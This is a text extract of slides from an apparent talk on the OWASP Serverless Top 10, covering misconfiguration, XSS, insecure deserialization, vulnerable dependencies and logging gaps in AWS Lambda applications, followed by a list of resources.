  • 38. A6: Security Misconfiguration ● Not just the function but how the function interacts with the environment ● Because of the complexity which is introduced due to increased features/functions, it’s very easy for security misconfiguration ● Can lead to DoS/timeouts ● Example: Public S3 buckets
  • 39. A7: Cross Site Scripting (XSS) ● Most common bug affects serverless functions as well ● Mostly due to lack of user input sanitization
  • 40. Find the bug… (scenario) User sends mail Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it and sends the message content to moderator dashboard
  • 42. Find the bug… Gets the message content Sends the message content to dashboard
  • 43.
  • 44. A8: Insecure Deserialization ● Common in Python and NodeJS, but also affects Java and dotNET ● Mostly introduced due to insecure use of 3rd party libraries
  • 46. The payload in request…
  • 48. A9: Using components with known vulnerabilities ● Using dependencies which are insecure ● Most commonly found ● Not every vulnerability will affect serverless functions ● Doesn’t always guarantee you remote exploitation
  • 49. A10: Insufficient Logging and Monitoring ● Serverless auditing is even more difficult than traditional web applications ● Since the client interacts directly with the serverless functions there is no place for implementing WAFs or any active monitoring systems ● This actually helps attackers
  • 52. Lambda Logs (in case of huge payload)
  • 53. Resources OWASP Serverless Top 10: https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project OWASP Serverless Top 10 GitHub repo: https://github.com/OWASP/Serverless-Top-10-Project Serverless Security - Function-as-a-Service: https://www.youtube.com/watch?v=c5ZHPc_yG4g Securing Serverless Applications Step-by-step: https://www.youtube.com/watch?v=B3j4xql7we0 AWS Serverless Functions: https://github.com/aws-samples/aws-serverless-workshops PureSec Serverless Top 10: https://github.com/puresec/sas-top-10
  • 54. Stay tuned ! Damn Vulnerable Serverless App on its way

Notes de l'éditeur

  1. The control was with the server. (Give example, cookie is still serverside in serverless)
  2. The control was with the server. (Give example, cookie is still serverside in serverless)
  3. The control was with the server. (Give example, cookie is still serverside in serverless)